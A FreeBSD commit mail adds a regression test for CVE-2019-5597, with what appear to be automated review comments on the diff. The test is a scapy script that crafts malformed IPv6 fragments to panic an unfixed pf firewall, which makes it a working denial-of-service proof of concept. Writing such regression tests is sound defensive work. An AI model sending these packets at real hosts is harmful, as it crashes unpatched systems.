svn commit: r344692 - head/tests/sys/netpfil/pf
Kristof Provost
kp at FreeBSD.org
Fri Mar 1 07:39:57 UTC 2019
Author: kp
Date: Fri Mar 1 07:39:55 2019
New Revision: 344692
URL: https://svnweb.freebsd.org/changeset/base/344692
Log:
pf tests: Test CVE-2019-5597
Generate a fragmented packet with different header chains, to provoke
the incorrect behaviour of pf.
Without the fix this will trigger a panic.
Obtained from: Corentin Bayet, Nicolas Collignon, Luca Moro at Synacktiv
Added:
head/tests/sys/netpfil/pf/CVE-2019-5597.py (contents, props changed)
Modified:
head/tests/sys/netpfil/pf/Makefile
head/tests/sys/netpfil/pf/fragmentation.sh
Added: head/tests/sys/netpfil/pf/CVE-2019-5597.py
==============================================================================
--- /dev/null 00:00:00 1970 (empty, because file is newly added)
+++ head/tests/sys/netpfil/pf/CVE-2019-5597.py Fri Mar 1 07:39:55 2019 (r344692)
@@ -0,0 +1,35 @@
+#!/usr/local/bin/python2.7
+
+import random
+import scapy.all as sp
+import sys
+
+UDP_PROTO = 17
+AH_PROTO = 51
+FRAG_PROTO = 44
+
+def main():
+ intf = sys.argv[1]
+ ipv6_src = sys.argv[2]
+ ipv6_dst = sys.argv[3]
+
+ ipv6_main = sp.IPv6(dst=ipv6_dst, src=ipv6_src)
+
+ padding = 8
+ fid = random.randint(0,100000)
+ frag_0 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=1, offset=0)
+ frag_1 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=0, offset=padding/8)
+
+ pkt1_opts = sp.AH(nh=AH_PROTO, payloadlen=200) \
+ / sp.Raw('XXXX' * 199) \
+ / sp.AH(nh=FRAG_PROTO, payloadlen=1) \
+ / frag_1
+
+ pkt0 = sp.Ether() / ipv6_main / frag_0 / sp.Raw('A' * padding)
+ pkt1 = sp.Ether() / ipv6_main / pkt1_opts / sp.Raw('B' * padding)
+
+ sp.sendp(pkt0, iface=intf, verbose=False)
+ sp.sendp(pkt1, iface=intf, verbose=False)
+
+if __name__ == '__main__':
+ main()
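Review bot: `offset=padding/8` in the `frag_1` construction yields an integer fragment offset only under Python 2's integer division; under Python 3 it would become `1.0`, so `offset=padding // 8` is the safer spelling and behaves the same on both. `main()` also reads `sys.argv[1]` through `sys.argv[3]` without checking the argument count, so a wrong invocation from the shell test ends in a bare IndexError traceback; a guard such as `if len(sys.argv) != 4: sys.exit("usage: CVE-2019-5597.py <iface> <src> <dst>")` would make that failure readable. The file has no docstring or comments, so I would add a short module docstring saying that the two fragments share one fragment id but carry different extension-header chains, and that, per the commit log, an unfixed pf panics when it processes them.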
Modified: head/tests/sys/netpfil/pf/Makefile
==============================================================================
--- head/tests/sys/netpfil/pf/Makefile Fri Mar 1 07:37:45 2019 (r344691)
+++ head/tests/sys/netpfil/pf/Makefile Fri Mar 1 07:39:55 2019 (r344692)
@@ -20,8 +20,10 @@ ATF_TESTS_SH+= anchor \
${PACKAGE}FILES+= utils.subr \
echo_inetd.conf \
- pft_ping.py
+ pft_ping.py \
+ CVE-2019-5597.py
${PACKAGE}FILESMODE_pft_ping.py= 0555
+${PACKAGE}FILESMODE_CVE-2019-5597.py= 0555
.include <bsd.test.mk>
Modified: head/tests/sys/netpfil/pf/fragmentation.sh
==============================================================================
--- head/tests/sys/netpfil/pf/fragmentation.sh Fri Mar 1 07:37:45 2019 (r344691)
+++ head/tests/sys/netpfil/pf/fragmentation.sh Fri Mar 1 07:39:55 2019 (r344692)
@@ -104,6 +104,11 @@ v6_body()
atf_check -s exit:0 -o ignore\
ping6 -c 1 -b 70000 -s 65000 2001:db8:43::3
+
+ $(atf_get_srcdir)/CVE-2019-5597.py \
+ ${epair_send}a \
+ 2001:db8:42::1 \
+ 2001:db8:43::3
}
v6_cleanup()
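Review bot: The new call to `CVE-2019-5597.py` in `v6_body` is not wrapped in `atf_check`, so if the script cannot run (python2.7 or scapy missing, bad interface name) its non-zero exit appears to be ignored and the test can pass without the fragments ever being sent. Running it as `atf_check -s exit:0 -o ignore $(atf_get_srcdir)/CVE-2019-5597.py ${epair_send}a 2001:db8:42::1 2001:db8:43::3` would surface that. Since the only failure signal today is a kernel panic, a follow-up `atf_check -s exit:0 -o ignore ping6 -c 1 2001:db8:43::3` after the script would also confirm that pf still passes traffic on a fixed kernel. `v6_body` starts outside this hunk, and whether the test head declares the python/scapy requirement cannot be seen from here.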